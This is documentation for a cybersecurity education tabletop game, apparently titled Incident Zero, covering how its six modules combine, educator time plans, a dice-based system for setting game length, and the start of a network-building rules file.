Duration: 30-45 minutes (solo), 25-35 minutes (in combination) Focus: Digital forensics, evidence handling, attack attribution Best For: Teaching chain of custody, investigation methodology, MITRE ATT&CK technique mapping

Standalone: Players investigate a compromised system, gathering evidence to build attribution, timeline, attack chain, and chain-of-custody progress In Combination: Investigates the breach from Incident Response or Disaster Recovery; discovered evidence informs Hardening or Audit priorities


6. Audit & Compliance Module

Duration: 30-45 minutes (solo), 15-20 minutes (in combination) Focus: Security compliance, audit procedures, governance Best For: Teaching regulatory frameworks, security assessment, governance workflows

Standalone: Players conduct security audits and address findings In Combination: Findings from Incident Response guide audit focus; OR used post-Hardening to validate controls


Module Combinations: Framework & Examples

Combination Philosophy

Each module can modify the next module in several ways:

  1. Outcome Modifiers: Results from one module affect setup of the next
  2. Information Modifiers: Discoveries in one module inform decisions in the next
  3. Constraint Modifiers: Limitations in one module carry forward
  4. Generated Modifiers: When modules aren't combined in sequence, modifiers are generated during setup (dice rolls, card draws, narrative decisions)

Combination Types

Solo Modules (No Dependencies)

Play any single module standalone. All modifiers are generated during setup via: - Dice rolls (d20 for random element) - Card draws (threat, defense, or scenario cards) - Educator narrative choices - Difficulty selection (Beginner/Intermediate/Advanced)

Examples: - Incident Response solo - Hardening solo - Disaster Recovery solo - Network Building solo - Forensics solo - Audit & Compliance solo

Linear Sequences (Recommended Paths)

Path A: Building → Defending

Network Building → Incident Response → Hardening

Path B: Crisis & Response

Incident Response (Loss) → Disaster Recovery → Audit

Path B2: Detect & Investigate

Incident Response → Forensics

Path C: Build, Test, Fix

Network Building → Audit → Hardening

Path D: Complete Lifecycle

Network Building → Hardening → Incident Response → Disaster Recovery → Forensics → Audit

Custom Combinations

Educators can mix modules any way they choose: - "We want Incident Response, then straight to Audit" - "Network Building + Hardening, no incident" - "Just Disaster Recovery for crisis training" - "Audit first, then rebuild with Hardening"

For any custom sequence: 1. Identify the first module → play normally with generated setup 2. For each subsequent module → during setup, generate any missing modifiers that would normally flow from prior modules

Modifier Generation (For Non-Sequential Play)

When modules aren't combined sequentially, educators create modifiers at setup using:

Scenario Deck: Pre-written scenario cards describing: - Network layouts (if starting mid-way) - Threat context (if starting without Incident Response) - Compliance requirements (if starting without Audit) - Budget constraints (if starting mid-lifecycle)

Dice Methods: Randomized setup parameters: - Roll d20 for network security level - Roll d20 for breach scope (for Disaster Recovery solo) - Roll d20 for compliance findings (for Audit solo)

Educator Narrative: Direct creation based on: - Learning objectives - Time available - Difficulty desired - Real-world inspiration

Example:

Educator wants: Network Building → Disaster Recovery (no Incident Response)

Setup for Disaster Recovery:
- Educator describes network built in prior module
- Generate breach scenario via dice or narrative:
  "Roll 2d6: (3,5) = Insider threat, moderate data loss"
  "Modifiers: Budget=60, Reputation=100, Dwell time=24 hours"
- Play Disaster Recovery with those generated modifiers

Module Flexibility & Educator Choice

Why Modules Over Phases?

"Phases" implies: - ❌ Linear progression (1→2→3) - ❌ Specific sequence required - ❌ All elements must be played - ❌ Rigid pedagogical structure

"Modules" enables: - ✅ Non-linear play - ✅ Flexible educator choice - ✅ Partial/complete experiences - ✅ Adapts to learning objectives - ✅ Combines in any sequence

Educator Decision Tree

START: What do you want to teach?

├─ "Incident response basics"
│  └─ Play: Incident Response module solo
│     (30-45 min, fast, focuses on detection)
│
├─ "Network security & architecture"
│  └─ Play: Network Building module solo
│     (30-45 min, strategic planning focus)
│
├─ "Defense-in-depth"
│  └─ Play: Hardening module solo
│     (30-45 min, layering & strategy)
│
├─ "Crisis management"
│  └─ Play: Disaster Recovery module solo
│     (30-45 min, pressure & decisions)
│
├─ "Compliance & governance"
│  └─ Play: Audit & Compliance module solo
│     (30-45 min, assessment & findings)
│
├─ "Digital forensics & attribution"
│  └─ Play: Forensics module solo
│     (30-45 min, evidence & investigation)
│
├─ "Complete incident lifecycle"
│  └─ Play: Incident Response → Disaster Recovery → Audit
│     (90-120 min, full arc, defeat scenario)
│
├─ "Defensive preparation"
│  └─ Play: Network Building → Hardening
│     (60-90 min, proactive focus)
│
├─ "Design, audit, defend"
│  └─ Play: Network Building → Audit → Hardening
│     (90-120 min, planning-focused)
│
├─ "Everything"
│  └─ Play: Network Building → Hardening → Incident Response → Disaster Recovery → Forensics → Audit
│     (4-5 hours, comprehensive, advanced)
│
└─ "Custom"
   └─ Pick any combination, generate modifiers for gaps

Module Mechanics: Consistency Across All

Common Elements (All Modules)

Every module includes: - Setup (5 minutes): Configure difficulty, generate modifiers - Gameplay (20-35 minutes): Core decision-making and rolls - Scoring/Outcome (5 minutes): Determine results - Debrief (5-15 minutes): Reflect on decisions and learning

Common Mechanics

Resource Management: - Budget (Incident Response, Hardening, Disaster Recovery, Network Building, Forensics) - Time/Turns (all modules) - Reputation/Morale (Disaster Recovery, Audit) - Progress Meters (Forensics: Attribution, Timeline, Attack Chain, Chain of Custody)

Decision Making: - Choose action from limited options (3-5 choices) - Roll d20 for success/failure - Technical justification bonuses (+2, +1) - Accept consequences or trade-offs

Modifiers & Penalties: - Uncontained Threats (Incident Response) - Pentester Tactics (Hardening) - Compliance Violations (Audit) - Network Vulnerabilities (Network Building) - Breach Scope (Disaster Recovery) - Anti-Forensics & Evidence Degradation (Forensics)

Debrief Questions: - What was the decision point? - What would you do differently? - How does this reflect reality? - What did you learn?


Module Compatibility Matrix

Which modules work well together?

                 IR    Hard   DR    Net    For    Audit
Incident Resp.   -     ✓✓    ✓✓    ✓      ✓✓     ✓
Hardening        ✓✓    -     ✓     ✓✓     ✓      ✓✓
Disaster Rec.    ✓✓    ✓     -     ✓      ✓✓     ✓✓
Network Build.   ✓     ✓✓    ✓     -      ✓      ✓✓
Forensics        ✓✓    ✓     ✓✓    ✓      -      ✓✓
Audit            ✓     ✓✓    ✓✓    ✓✓     ✓✓     -

Legend:
✓✓ = Highly compatible (strong modifier flow)
✓  = Compatible (weak modifier flow, mostly independent)
-  = Same module (obviously)

Example:
- Incident Response + Forensics = ✓✓ (revealed attack chain feeds the investigation)
- Network Building + Hardening = ✓✓ (complementary)
- Forensics + Audit = ✓✓ (findings drive assessment focus)

Documentation Structure

To support module flexibility:

docs/
├── FRAMEWORK.md                    # THIS FILE - Module philosophy & combinations
├── module-combinations.md          # Educator guide to combining modules
├── rules/
│   ├── core-rules.md              # Core mechanics (timeless)
│   ├── module-incident-response.md # Full IR rules
│   ├── module-hardening.md        # Full Hardening rules
│   ├── module-disaster-recovery.md# Full DR rules
│   ├── module-network-building.md # Full Network rules
│   ├── module-forensics.md        # Full Forensics rules
│   └── module-audit-compliance.md # Full Audit rules
└── standalone-games/
    ├── incident-response.md       # IR solo setup & play
    ├── hardening.md               # Hardening solo setup & play
    ├── disaster-recovery.md       # DR solo setup & play
    ├── network-building.md        # Network solo setup & play
    ├── forensics.md               # Forensics solo setup & play
    └── audit-compliance.md        # Audit solo setup & play

Version Notes

Current: v2.2 (Playtest Edition)

Modules based on: - Incident Response v2.1 with Uncontained Threats & Pentester Tactics - Hardening as the post-detection defensive module (typically follows an IR win) - Disaster Recovery as the breach-crisis module (typically follows an IR loss) - Network Building from original design (needs v2.1 refresh) - Forensics added in v2.1 (investigation & attribution) - Audit & Compliance from original design (needs v2.1 refresh)

Pending Refinements: - Network Building: Update to reflect v2.1 mechanics - Audit & Compliance: Update to reflect v2.1 mechanics - All modules: Explicit standalone setup procedures - Modifier generation: Formalize dice/card procedures


For Educators

Key Takeaway: You are not bound to a rigid structure. Incident Zero modules are tools in your pedagogical toolkit. Choose the modules that serve your learning objectives, sequence them in any order, and use the flexibility to adapt to your classroom needs.

Examples of Flexibility:

"I only have 45 minutes" → Play one module solo (Incident Response or Hardening)

"I want to teach the complete lifecycle" → Play all 6 modules in sequence (4-5 hours, split across sessions)

"My students need crisis management training" → Play Disaster Recovery solo

"I want to rebuild after a fictional breach" → Network Building + Hardening (no Incident Response)

"I need governance training" → Audit & Compliance solo or after Hardening


Bottom Line: Incident Zero is flexible. Your classroom needs come first. Choose the modules and combinations that work for you.

docs/module-combinations.md

Module Combinations: Quick Reference Guide for Educators

This guide provides quick reference combinations for the 6 modules and recommended time allocations.


The Six Modules (v2.1)

  1. Network Building - Design and secure infrastructure
  2. Hardening - Build defense-in-depth against known threats
  3. Incident Response - Detect and investigate hidden attacks
  4. Disaster Recovery - Manage breach crisis and recovery
  5. Forensics - Investigate compromised systems and attribute attacks
  6. Audit & Compliance - Assess security posture and control effectiveness

Quick Start: Choose Your Time & Objective

30-45 Minutes: Single Module

Pick ONE module and play it solo with generated modifiers.

Module Focus Setup Gameplay Debrief
Network Building Infrastructure design 5 min 25-35 min 5-10 min
Hardening Defense-in-depth 5 min 25-35 min 5-10 min
Incident Response Attack detection 5 min 25-35 min 5-10 min
Disaster Recovery Crisis management 5 min 25-35 min 5-10 min
Forensics Investigation & attribution 5 min 25-35 min 5-10 min
Audit & Compliance Security assessment 5 min 25-35 min 5-10 min

Setup Note: Generate all modifiers (dice rolls, scenario cards) during setup phase.


60-90 Minutes: Two-Module Combinations

Path A: Building & Testing

Network Building → Incident Response - Network designed in Module 1 - Attack tests network design in Module 2 - Modifiers Flow: Network layout informs threat scenarios - Learning: How network design affects attack surface - Total Time: 10 min setup + 55-70 min gameplay + 10 min debrief

Path B: Response & Recovery (Win)

Incident Response (Win) → Hardening - Attack detected successfully - Build defenses against known threats - Modifiers Flow: Discovered attack vectors guide defense priorities - Learning: How detection informs hardening strategy - Total Time: 10 min setup + 55-70 min gameplay + 10 min debrief

Path C: Response & Recovery (Loss)

Incident Response (Loss) → Disaster Recovery - Attack succeeds; breach occurs - Crisis management under pressure - Modifiers Flow: Breach scope determined by IR outcome - Learning: Cost of detection failure; crisis response procedures - Total Time: 10 min setup + 55-70 min gameplay + 10 min debrief

Path D: Design & Audit

Network Building → Audit & Compliance - Network designed to meet requirements - Audit identifies gaps and violations - Modifiers Flow: Network design determines audit findings - Learning: Compliance integration into design phase - Total Time: 10 min setup + 55-70 min gameplay + 10 min debrief

Path E: Detect & Investigate (NEW with Forensics)

Incident Response (Win) → Forensics - Attack detected successfully in IR phase - Forensic investigation to understand and attribute attack - Modifiers Flow: Discovered attack chain guides forensic analysis - Learning: How investigation reveals attacker techniques and identity - Total Time: 10 min setup + 55-70 min gameplay + 10 min debrief

Path F: Crisis & Investigation (NEW with Forensics)

Disaster Recovery → Forensics - Crisis response to major breach (from IR failure) - Forensic investigation to understand scope and attribution - Modifiers Flow: DR outcomes inform forensic investigation priorities - Learning: How investigation informs future hardening decisions - Total Time: 10 min setup + 55-70 min gameplay + 10 min debrief


90-120 Minutes: Three-Module Combinations

Path A: Build, Test, Fix

Network Building → Incident Response → Hardening - Network design established - Attack tests the network - Hardening addresses findings - Modifiers Flow: Design → Attack vectors → Defense priorities - Learning: Complete security lifecycle (design → test → improve) - Total Time: 15 min setup + 80-100 min gameplay + 10-15 min debrief

Path B: Incident & Recovery (Full Arc - Loss)

Incident Response (Loss) → Disaster Recovery → Audit - Detection fails; breach occurs - Crisis management and recovery - Compliance audit of breach response - Modifiers Flow: IR outcome → DR decisions → Audit findings - Learning: Incident lifecycle from failure through recovery - Total Time: 15 min setup + 80-100 min gameplay + 10-15 min debrief

Path C: Network, Hardening, Audit

Network Building → Hardening → Audit & Compliance - Network designed - Defenses built proactively - Compliance validation - Modifiers Flow: Design → Defense strategy → Audit review - Learning: Proactive security from design through validation - Total Time: 15 min setup + 80-100 min gameplay + 10-15 min debrief

Path D: Planning & Response

Network Building → Incident Response → Disaster Recovery - Network architecture established - Attack against that architecture - Crisis management following detection failure - Modifiers Flow: Design → Attack scenarios → Breach scope - Learning: How design affects attack success/failure - Total Time: 15 min setup + 80-100 min gameplay + 10-15 min debrief

Path E: Response, Crisis & Investigation (NEW with Forensics)

Incident Response (Loss) → Disaster Recovery → Forensics - Detection fails; breach occurs - Crisis management and response - Forensic investigation for lessons learned - Modifiers Flow: IR outcome → DR decisions → Forensic findings - Learning: Complete failure response lifecycle with attribution - Total Time: 15 min setup + 80-100 min gameplay + 10-15 min debrief

Path F: Detection, Investigation & Hardening (NEW with Forensics)

Incident Response (Win) → Forensics → Hardening - Attack detected and contained - Forensic investigation reveals techniques and attribution - Hardening built specifically against discovered attack - Modifiers Flow: Detected threats → Forensic findings → Defense priorities - Learning: Complete investigation-to-hardening workflow - Total Time: 15 min setup + 80-100 min gameplay + 10-15 min debrief


2+ Hours: Four or Five Module Combinations

Path A: Complete Lifecycle (Winning Path)

Network Building → Incident Response (Win) → Hardening → Audit - Design secure network - Test against attack (succeed) - Harden based on findings - Audit final security posture - Best For: Advanced learners, comprehensive security overview - Total Time: 20 min setup + 140-170 min gameplay + 15 min debrief

Path B: Complete Lifecycle (Recovery Path)

Network Building → Incident Response (Loss) → Disaster Recovery → Hardening → Audit - Design network - Attack succeeds - Crisis management - Rebuild/harden after breach - Compliance audit of recovery - Best For: Advanced learners, crisis + recovery + compliance - Total Time: 25 min setup + 160-190 min gameplay + 20 min debrief

Path C: Complete Lifecycle with Forensics (Investigation Focus)

Network Building → Incident Response (Loss) → Disaster Recovery → Forensics → Hardening - Design network - Attack detection fails - Crisis response - Forensic investigation and attribution - Build hardening based on forensic findings - Best For: Advanced learners, investigation-focused curriculum - Total Time: 25 min setup + 165-190 min gameplay + 20 min debrief

Path D: Complete Lifecycle with Forensics (Success Focus)

Network Building → Incident Response (Win) → Forensics → Hardening → Audit - Design network - Attack detected and contained - Forensic investigation reveals techniques - Hardening against discovered threats - Audit of final security posture - Best For: Advanced learners, successful response workflow - Total Time: 25 min setup + 165-190 min gameplay + 20 min debrief

Path E: All Six Modules (Complete Security Lifecycle)

Network Building → Hardening → Incident Response → Disaster Recovery → Forensics → Audit & Compliance - Design secure network - Build proactive defenses - Test against attack - Handle breach crisis (if IR fails) - Investigate for lessons learned - Audit overall security posture - Best For: Research, comprehensive security curriculum, teacher training - Total Time: 30 min setup + 210-240 min gameplay + 25 min debrief


Tournament Mode: Competitive Framework

Setup: All teams play same module(s) simultaneously

Single Module Tournament (45-60 minutes)

Multi-Module Tournament (2-2.5 hours)


Modifier Generation Procedures

When modules aren't combined sequentially, generate missing modifiers during setup:

For Hardening Module (Solo or Mid-Sequence)

Generate Attack Vectors via Scenario Card: - Draw 4 cards from scenario deck - Each card describes a threat vector and difficulty - Players must defend against all 4 vectors

Or Generate via Dice: - Roll 4d6 for each vector type - Result determines threat sophistication (3=easy, 6=hardest) - Adjust defense difficulty accordingly

For Disaster Recovery Module (Solo or Mid-Sequence)

Generate Breach Scope via Dice: - Roll 2d6: [3-5] = Low (50K records), [6-8] = Medium (500K), [9-12] = High (5M+) - Generate breach timeline: Roll 1d4 = hours before discovery (1=6h, 2=12h, 3=24h, 4=48h) - Set ransom demand: d20 × $50K

Or Use Scenario Card: - Educator describes breach scenario (real or fictional) - Players respond to described incident

For Incident Response Module (Solo)

Generate Attack Chain via Threat Cards: - Shuffle threat card deck - Draw 3, 4, or 5 cards (by difficulty) - Arrange in logical attack progression - Create clues for Threat Orchestrator

Or Use Pre-Built Scenario: - Use sample scenarios from core rules - Customize threat vectors based on learning objectives

For Network Building Module (Solo)

Generate Requirements via Requirement Card: - Draw cards specifying assets: "Email Server, Customer Database, Development Network" - Draw security requirements: "MFA required, Data encryption mandatory, Audit logging" - Players design network meeting all constraints

For Audit & Compliance Module (Solo)

Generate Audit Scope via Dice: - Roll 1d4: [1] = Financial compliance, [2] = Data protection, [3] = Incident response, [4] = Mixed - Roll 1d3: [1] = 3 findings needed, [2] = 5 findings, [3] = 7 findings - Determine which findings player must identify during audit


Customization Guide: Creating Your Own Combinations

Step 1: Choose Your Learning Objective

Example: "Teach incident response AND hardening in 90 minutes"

Step 2: Select Modules That Support the Objective

Step 3: Plan Modifier Flow

Step 4: Prepare Setup Materials

Step 5: Time Allocation


Quick Compatibility Checklist

Which modules work well together?

High Compatibility (Strong modifier flow): - ✓✓ Incident Response + Hardening - ✓✓ Incident Response + Forensics (if IR successful) - ✓✓ Disaster Recovery + Forensics (if IR fails) - ✓✓ Forensics + Hardening (forensic findings guide hardening) - ✓✓ Forensics + Audit (forensic findings inform compliance) - ✓✓ Network Building + Hardening - ✓✓ Network Building + Audit - ✓✓ Disaster Recovery + Audit - ✓✓ Incident Response + Disaster Recovery

Medium Compatibility (Weak modifier flow, mostly independent): - ✓ Incident Response + Audit - ✓ Hardening + Disaster Recovery - ✓ Network Building + Disaster Recovery - ✓ Incident Response + Network Building - ✓ Forensics + Network Building (investigation reveals architecture needs)


Educator Tips

For Time-Constrained Sessions

For Multiple Class Sessions

For Competitive Tournaments

For Maximum Engagement


Printable Quick Reference (For Your Desk)

Single Module = 45 min session - Setup: 5 min - Play: 25-35 min - Debrief: 5-10 min

Two Modules = 90 min session - Setup: 10 min - Play: 55-70 min - Debrief: 10-15 min

Three Modules = 120 min session - Setup: 15 min - Play: 80-100 min - Debrief: 10-15 min

Four/Five Modules = 2+ hours - Setup: 20-25 min - Play: 140-210 min - Debrief: 15-25 min


Last updated: October 2025 For complete module details, see docs/FRAMEWORK.md

docs/VARIABLE_GAME_LENGTH_SYSTEM.md

Variable Game Length System (v2.1)

Version: 2.1 - Production Ready Last Updated: October 2025 Status: Core System for All Modules


Overview

Incident Zero v2.1 introduces a Variable Game Length System that adds realism and variety without requiring complex calculations. The system has two parallel tracks:

  1. Default Formula - Simple, fast, for everyone (1 calculation, 5 seconds)
  2. Advanced Tier System - Nuanced, variable, for experienced TOs (3 steps, optional complexity)

Both produce realistic game lengths that scale with attack complexity while maintaining educational depth.


Philosophy

Why Variable Lengths?

Real-world basis: - Some cyberattacks unfold in hours (ransomware deployments) - Others take months (APT reconnaissance and persistence) - Fixed 7-turn limits feel artificial

Educational value: - Variable timelines teach "attacks aren't one-size-fits-all" - Tight timelines create pressure; loose timelines reward caution - Randomness mirrors real incident response unpredictability

Game design value: - Prevents pattern recognition ("all games are exactly 7 turns") - Encourages adaptation ("we have fewer turns, prioritize differently") - Adds replayability ("same scenario, different timeline")


System 1: Default Formula (Beginners & Quick Play)

Formula

Turn Count = (Number of Attack Cards × 2) + 1

Quick Reference Table

Attack Chain Calculation Turn Count Session Time
3 cards (3 × 2) + 1 7 turns ~30-40 min
4 cards (4 × 2) + 1 9 turns ~35-45 min
5 cards (5 × 2) + 1 11 turns ~40-50 min
6 cards (6 × 2) + 1 13 turns ~45-55 min

Why This Formula?

Usage Example

Beginner Threat Orchestrator:

"I've selected 4 threat cards for my attack chain: Phishing → Credential Theft → Lateral Movement → Ransomware. Using the formula: (4 × 2) + 1 = 9 turns. You have 9 turns to detect and contain all four threats. Timer starts now!"

Implementation Steps

  1. Design attack chain (select 3, 4, 5, or 6 threat cards)
  2. Apply formula (Cards × 2 + 1)
  3. Announce turn count (no explanation needed—it's the default)
  4. Play normally (use that turn count as hard limit)

System 2: Advanced Tier System (Experienced TOs)

Overview

The Tier + d4 system gives experienced Threat Orchestrators control over attack sophistication while maintaining randomness for realism.

Turn Count = [Tier Base Range] + d4 Modifier

Step 1: Select Attack Complexity Tier

Choose ONE tier based on attack sophistication (not visibility to players):

TIER 1: Simple & Obvious (5-7 turns base)

Attacker Profile: - Script kiddies using publicly available tools - Low operational security - Little reconnaissance - Obvious techniques

Examples: - Basic phishing + default malware - Publicly known exploits - No persistence mechanisms

When to Use: - Beginner players learning the game - Educational scenario with clear attack progression - Teaching specific threat technique


TIER 2: Standard Sophistication (8-10 turns base)

Attacker Profile: - Organized cybercriminal group - Medium operational security - Some reconnaissance - Mix of known and custom tools

Examples: - Targeted phishing + credential harvesting - Lateral movement with known exploits - Basic persistence mechanisms - Some anti-analysis awareness

When to Use: - Most standard scenarios - Realistic criminal syndicate attacks - Default for intermediate players


TIER 3: Highly Sophisticated (11-13 turns base)

Attacker Profile: - Advanced Persistent Threat (APT) group - Strong operational security - Extensive reconnaissance - Custom tools and zero-days

Examples: - Multi-vector attack with coordination - Advanced persistence (firmware, kernel modules) - Anti-forensics techniques - Encrypted command-and-control

When to Use: - Advanced player groups - Teaching state-sponsored attack techniques - Scenarios based on real APT campaigns


TIER 4: Expert / Nation-State (14-16 turns base)

Attacker Profile: - State-sponsored cyber operations - Extreme operational security - Months of reconnaissance - Military-grade tools and exploits

Examples: - Coordinated multi-system compromise - Supply chain attacks - Persistent access maintained for years - Infrastructure with plausible deniability

When to Use: - Research and curriculum development - Training elite response teams - Historical incident analysis (Stuxnet, NotPetya, etc.)


Step 2: Roll for Variation (Optional)

To add unpredictability, roll 1d4 and apply modifier:

Roll Modifier Interpretation Examples
1 -1 turn Tight/Fast "Attacker worked faster than expected; they had insider knowledge"
2 or 3 ±0 turns No change "Timeline proceeded as expected"
4 +1 turn Loose/Slow "Attacker was cautious with extended reconnaissance phase"

d4 Distribution: - 25% chance of tight timeline (-1) - 50% chance of baseline (±0) - 25% chance of extended timeline (+1)

Step 3: Calculate Final Turn Count

Final Turn Count = Tier Base + d4 Result

Examples

Example 1: Standard Criminal Group (TIER 2)

Tier: TIER 2 (8-10 turns base)
Narrative: Organized ransomware group targeting healthcare
Roll: d4 = 2 (no modifier)
Final: 8-10 turns

Announcement: "This organized group has compromised your network.
You have 8-10 turns to detect and contain them."

Example 2: APT Attack (TIER 3)

Tier: TIER 3 (11-13 turns base)
Narrative: State-sponsored group conducting corporate espionage
Roll: d4 = 4 (+1 turn)
Final: 12-14 turns

Announcement: "A sophisticated actor has been operating in your network
for weeks. You have 12-14 turns to uncover the full extent of their access."

Example 3: Script Kiddie (TIER 1)

Tier: TIER 1 (5-7 turns base)
Narrative: Attacker using public PoC exploit
Roll: d4 = 1 (-1 turn)
Final: 4-6 turns

Announcement: "An attacker has hit your systems hard and fast.
You have only 4-6 turns before data starts being exfiltrated."

Critical Game Integrity Rules

These three rules ensure the system maintains educational value and prevents metagaming:


Rule 1: Accept Any Roll (Even If It Feels Wrong)

Statement: Threat Orchestrators MUST accept the d4 result as-is, regardless of whether it feels unreasonably tight or loose for the scenario.

Rationale: Real incident response is chaotic. Sometimes: - Well-prepared attackers execute faster than expected (they had intel) - Cautious attackers spend weeks in reconnaissance (defensive posture matters) - Budget runs out faster than expected (incident response is expensive)

Embracing the Chaos: When a roll feels unexpected, narrate it as realism:

Implementation: - Roll d4 publicly (so players see it wasn't rigged) - Accept the result immediately - Narrate it into the scenario realistically - Move on; don't second-guess the dice

Example Conversation:

TO: "TIER 2 attack, so 8-10 turns baseline. Rolling for variation..."
[Rolls d4: 1, which means -1]
TO: "That's tight—only 7-9 turns. But that makes sense; this group
    has compromised your supplier before and knew your infrastructure.
    You have 7-9 turns."

What NOT to do:

TO: "I rolled a 1, but that feels too tight. Let me roll again."
    ✗ NO - Accept the first roll

TO: "I rolled a 1, so I'm ignoring it and using 8-10 instead."
    ✗ NO - That undermines the system

TO: "That's tight but I'll add 2 turns to make it fair."
    ✗ NO - Only Rule 3 allows modifications (and only ±1, rarely)

Rule 2: Players Cannot Question Attack Tier Based on Turn Count

Statement: Blue Team members CANNOT deduce (or ask about) the attack TIER from the announced turn count. They cannot use meta-information like "we have 9 turns, so this must be TIER 2."

Rationale: - In reality, companies don't know attack sophistication in advance - Attackers don't advertise their skill level - Discovering attacker sophistication through evidence is more educational - This prevents metagaming ("we know it's TIER 2, so let's play for 9 turns max")

What Players CAN Do: - Ask "What suspicious activity have we detected?" → Investigates to understand threats - Ask "Can we analyze the malware?" → Reveals sophistication through findings - Ask "Why did this attack succeed?" → Post-game discussion (after game ends) - Ask "How much damage was done?" → Forensic investigation (post-game)

What Players CANNOT Do: - Ask "Is this a TIER 2 attack?" → Directly asking tier (prohibited) - Say "This must be TIER 3 because we have 12 turns" → Meta-reasoning (prohibited) - Assume "TIER 1 = simple, so let's focus on basics" → Meta-optimization (prevents discovery)

Implementation:

When players ask about tier/difficulty:

Player: "Is this a TIER 2 attack?"
TO: "Investigate and you'll find out. What do you want to do?"

Player: "This looks like TIER 3 based on the turn count..."
TO: "Turn count ≠ difficulty. Investigate the evidence and make your own assessment."

Player: "Can we see what we're facing?"
TO: "Some will reveal through investigation. Some will surprise you."

Rule 3: TO Modifier Authority (Rare & Optional)

Statement: ONLY after rolling d4, the Threat Orchestrator may apply an optional ±1 turn adjustment if the rolled result creates a genuinely problematic situation.

Frequency: This should be RARE (< 10% of games). Default: accept rolls.

When to Use (Genuinely Justified):

  1. Unusually Complex Setup
  2. Scenario has 6+ subsystems (normal is 3-4)
  3. Multiple attack vectors that need separate investigation
  4. Recommend: Extend by +1 to allow full exploration

  5. New Player Group

  6. First game ever; players still learning system
  7. Recommend: Extend by +1 to reduce pressure on learning
  8. (But challenge them on game 2)

  9. Specific Real-World Incident

  10. Teaching historical breach with documented timeline
  11. Example: "NotPetya took 4 hours to spread; we're modeling that"
  12. Recommend: Adjust to match documented timeline (with explanation)

When NOT to Use (Accept Roll As-Is):

  1. "The roll feels unlucky" → Accept chaos; it's realistic
  2. "I want exactly 10 turns" → Let the dice decide
  3. "The attack chain is long" → That's what TIER system handles
  4. "I miscalculated the TIER" → Reroll from scratch next game
  5. "Players are doing well, so more turns" → Never adjust mid-game

Implementation:

Step 1: Roll d4 (publicly)
Step 2: Calculate result (Tier Base + d4)
Step 3: Announce initial turn count

THEN if genuinely needed:

Step 4: Pause
Step 5: Explain why adjustment is necessary
Step 6: Apply ±1 modification (only ±1, not more)
Step 7: Announce final turn count
Step 8: Document the decision (for consistency in future scenarios)

Example Valid Use of Rule 3:

Setup: "I'm teaching the SolarWinds supply chain attack.
Real timeline was 6 hours to detection.
I have TIER 3 (11-13 turns).
Rolled d4: 2 (no modifier) = 11-13 turns.
That feels right—letting me adjust by -1 to model
the documented 10-12 hour timeline. Final: 10-12 turns."

Example Invalid Use of Rule 3:

WRONG: "I rolled 8-10 turns but my attack chain is 5 cards.
I want it longer, so I'm adding 2 turns."
CORRECT: Use TIER 3 (11-13) if you want a longer game

WRONG: "Players are doing well, so I'm extending by +2 turns."
CORRECT: No mid-game adjustments; accept the result

WRONG: "I'm just going to ignore the roll and use 10 turns."
CORRECT: Either accept d4 result or reroll from scratch (before game starts)

Choosing Between Systems

Use Default Formula If:

Use Tier + d4 If:

Hybrid Approach: Many TOs use Default Formula for most games, then switch to Tier System for special campaigns or advanced groups.


Implementation Workflow

For Beginners (Default Formula)

1. Design attack chain (pick 3-6 threat cards)
2. Count cards: ___
3. Calculate: (___ × 2) + 1 = ___ turns
4. Announce: "You have ___ turns."
5. Play

Time Investment: 30 seconds

For Advanced (Tier System)

1. Design attack scenario
2. Choose Tier 1-4 based on sophistication (don't announce number)
3. Write down Tier Base (e.g., "TIER 2: 8-10")
4. Roll d4 (publicly or private)
5. Calculate: Base + d4 result = Final turn count
6. [Optional] Apply Rule 3 modification if genuinely needed (rare)
7. Announce final turn count (no tier numbers)
8. Play
9. [After game] Discuss attack sophistication discovered through gameplay

Time Investment: 2-3 minutes


Quick Reference Card (Print & Keep at Table)

═══════════════════════════════════════════════════════════════
              VARIABLE GAME LENGTH SYSTEM v2.1
═══════════════════════════════════════════════════════════════

SYSTEM 1: DEFAULT FORMULA (Beginners)
────────────────────────────────────
Turn Count = (Attack Cards × 2) + 1

3 cards → 7 turns  |  4 cards → 9 turns
5 cards → 11 turns |  6 cards → 13 turns

SYSTEM 2: TIER + d4 (Advanced)
──────────────────────────────
Step 1: Choose Tier (1-4, don't reveal number)
  TIER 1: 5-7 turns (simple)
  TIER 2: 8-10 turns (standard)
  TIER 3: 11-13 turns (advanced)
  TIER 4: 14-16 turns (expert)

Step 2: Roll d4 (-1, 0, 0, or +1)

Step 3: Final Turn = Tier Base + d4 Result

CRITICAL RULES
──────────────
✓ Rule 1: Accept any roll (embrace chaos)
✓ Rule 2: Don't reveal tier (let players discover via gameplay)
✓ Rule 3: Modifier authority ONLY when genuinely needed (rare)

═══════════════════════════════════════════════════════════════

Frequently Asked Questions

Q: Why use (×2) + 1 and not something else? A: Playtesting showed this gives attackers enough time to progress realistically while keeping games from dragging. It's also easy to calculate mentally.

Q: Can I use both systems in the same campaign? A: Yes! Use Default Formula for most games, Tier System for special scenarios.

Q: What if players figure out the formula? A: That's fine. Knowing the formula doesn't give them an advantage (they still don't know how many cards in the chain).

Q: Can I adjust turn count during the game? A: NO. Turn count is set at game start and never changes. Rule 3 modifications happen before game starts only.

Q: What if my attack chain doesn't fit (e.g., 2 cards or 7 cards)? A: - 2 cards: Use formula anyway (2 × 2 + 1 = 5 turns) or switch to Tier System - 7+ cards: Use Tier 3-4 instead of formula

Q: How do I explain randomness to new players? A: "Real incident response isn't predictable. Sometimes attackers are faster, sometimes slower. We're rolling to capture that realism."

Q: Should I tell players the turn count? A: YES, always tell them at game start. (The mystery is about attack sophistication, not game length.)

Q: Can I use a d6 or d12 instead of d4? A: Not recommended (changes probability distribution). Stick with d4 or no roll at all.


Evolution & Future

This system was introduced in v2.1 as players requested more realism in game pacing. Future versions may include:

For now, the two-track system (Default + Tier) provides both accessibility and depth.


Design Notes for Future Playtests

Questions to answer through playtesting:

  1. Does Default Formula (×2 + 1) create good pacing for all group types?
  2. Are players satisfied with Tier + d4 variability?
  3. Do the three Critical Rules prevent metagaming effectively?
  4. Should some modules have different formulas (e.g., Forensics longer)?
  5. Is Rule 3 invoked correctly or too often?

Feedback to collect: - Typical game length vs. expected (from formula) - Whether turn limits felt realistic - Whether players felt rushed or bored - Whether tier-hiding created effective mystery

Report findings to: GitHub Issues - Variable Game Length Feedback


Ready to set game length? Pick your formula and play!

docs/rules/module-network-building.md

Network Building Module: Rules & Mechanics

Version: 2.2 - Playtest Edition Last Updated: July 2026


Module Overview

The Network Building Module teaches players how to design IT infrastructure under budget constraints, business requirements, and trade-off decisions. This is a pre-game module designed to create the network context for other modules (particularly Incident Response, Hardening, and Disaster Recovery).

